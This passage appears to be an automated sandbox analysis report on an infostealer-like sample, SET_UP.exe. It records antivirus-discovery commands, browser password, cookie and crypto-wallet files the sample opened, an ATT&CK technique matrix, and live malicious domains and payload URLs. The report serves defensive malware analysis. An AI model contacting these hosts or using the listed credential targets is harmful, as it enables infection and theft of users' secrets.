                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: @System@LoadResourceModule$qqrpbo,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,34_2_5000C58C
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString,GetLocaleInfoW,@System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi,@System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString,34_2_50025B78
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: @Sysutils@GetLocaleChar$qqriib,GetLocaleInfoW,34_2_50025BC4
                      Source: C:\Users\user\Desktop\SET_UP.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: 34_2_50022830 @Sysutils@CurrentYear$qqrv,GetLocalTime,34_2_50022830
                      Source: C:\Users\user\Desktop\SET_UP.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: SET_UP.exe, 00000000.00000003.2091830519.000000000352E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973844479.0000000003529000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: find.exe, 00000019.00000002.2259508999.000001D54F8B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
                      Source: C:\Users\user\Desktop\SET_UP.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR
                      Source: Yara match File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s/Electrum-LTC
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: llets/ElectronCash
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: SET_UP.exe, 00000000.00000002.2099151002.0000000000826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: omihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onh
                      Source: SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000087A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: SET_UP.exe, 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                      Source: SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Livet
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\Desktop\SET_UP.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\Desktop\SET_UP.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\Desktop\SET_UP.exe, Directory queried: C:\Users\user\Documents
                      Source: Yara match, File source: 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match, File source: Process Memory Space: SET_UP.exe PID: 6556, type: MEMORYSTR
                      Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe, Code function: 34_2_5000F05C @Rtlconsts@_sCannotListenOnOpen,@Rtlconsts@_sCannotCreateSocket,@Rtlconsts@_sSocketAlreadyOpen,@Rtlconsts@_sCantChangeWhileActive,@Rtlconsts@_sSocketMustBeBlocking,@Rtlconsts@_sSocketIOError,34_2_5000F05C
                      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                      | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                      | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                      | Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 421 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                      | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
                      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 12 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                      | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 245 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                      [Behavior graph: ID 1580732, Sample: SET_UP.exe, Start date: 25/12/2024, Architecture: WINDOWS, Score: 100]

                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | SET_UP.exe | 11% | Virustotal | | Browse |
                      | SET_UP.exe | 16% | ReversingLabs | Win32.Hacktool.Generic | |
                      | Source | Detection | Scanner | Label | Link |
                      |---|---|---|---|---|
                      | C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe | 3% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe (copy) | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\is-RBCNP.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmp | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\maddisAsm_.bpl (copy) | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\madexcept_.bpl (copy) | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\rtl120.bpl (copy) | 0% | ReversingLabs | | |
                      | C:\Users\user\AppData\Roaming\UltraMedia\vcl120.bpl (copy) | 0% | ReversingLabs | | |
                      No Antivirus matches
                      No Antivirus matches
                      | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                      |---|---|---|---|---|---|
                      | laborersquei.click | 104.21.89.250 | true | true | | unknown |
                      | klipsyzogey.shop | 172.67.214.186 | true | false | | unknown |
                      | neqi.shop | unknown | unknown | false | | high |
                      Name | Source | Malicious | Antivirus Detection | Reputation
                                            https://duckduckgo.com/chrome_newtabSET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSET_UP.exe, 00000000.00000003.1979005683.0000000003990000.00000004.00000800.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000000.2098145757.0000000000321000.00000020.00000001.01000000.00000006.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe.0.drfalse
                                                high
                                                https://laborersquei.click/G9udVSET_UP.exe, 00000000.00000003.1826848306.0000000003526000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ocsp.sectigo.com0SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                    high
                                                    https://klipsyzogey.shop:443/int_clp_sha.txtSET_UP.exe, 00000000.00000003.2091901198.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/soap/envelope/VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2353924562.0000000059801000.00000020.00000001.01000000.0000000B.sdmp, is-UIAB4.tmp.7.drfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                            high
                                                            https://laborersquei.click/SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1851412519.000000000352C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827023750.000000000352E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://laborersquei.click/FxSET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://laborersquei.click/~SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826911184.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://klipsyzogey.shop/avSET_UP.exe, 00000000.00000002.2099859671.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://neqi.shop/sdgjyut/psh.txtSET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://laborersquei.click/api&SET_UP.exe, 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://neqi.shop/sdgjyut/psh.txt#SET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://www.remobjects.com/psVER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drfalse
                                                                high
                                                                http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.innosetup.com/VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2101675445.000000000333F000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.exe, 00000004.00000003.2105415101.000000007EEDB000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000000.2108717164.00000000008C1000.00000020.00000001.01000000.00000007.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000000.2131734150.0000000000B5D000.00000020.00000001.01000000.00000009.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp.4.drfalse
                                                                          high
                                                                          https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.innosetup.com/SET_UP.exefalse
                                                                              high
                                                                              https://sectigo.com/CPS0SET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                high
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://laborersquei.click/.weSET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://laborersquei.click/.SET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://laborersquei.click/api3SET_UP.exe, 00000000.00000003.1897227227.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSET_UP.exe, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                        high
                                                                                        https://laborersquei.click/FSET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1804358523.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1827141410.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1804543309.0000000003575000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1826974677.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1850901122.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1804007510.0000000003568000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803808665.0000000003569000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803894177.0000000003567000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tVER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                                    high
                                                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, VER7RSX5CP4YEKECQGJ84KT.tmp, 00000007.00000002.2314319057.00000000012EC000.00000004.00000010.00020000.00000000.sdmp, is-36S8B.tmp.7.dr, is-SQ6C4.tmp.7.dr, is-UIAB4.tmp.7.dr, is-RBCNP.tmp.7.drfalse
                                                                                                      high
                                                                                                      https://laborersquei.click/NSET_UP.exe, 00000000.00000003.1849198873.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://support.microsofSET_UP.exe, 00000000.00000003.1804358523.00000000035C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1849682302.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.info-zip.org/IUService.exe, 00000022.00000002.2326879519.00000000092BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://laborersquei.click/UU8SET_UP.exe, 00000000.00000003.1874088390.000000000352C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://klipsyzogey.shop/int_clp_sha.txtlSET_UP.exe, 00000000.00000002.2099859671.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973689658.00000000008B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://laborersquei.click/fSET_UP.exe, 00000000.00000003.1898087172.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1938865603.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.remobjects.com/psSET_UP.exefalse
                                                                                                                high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1804543309.0000000003550000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
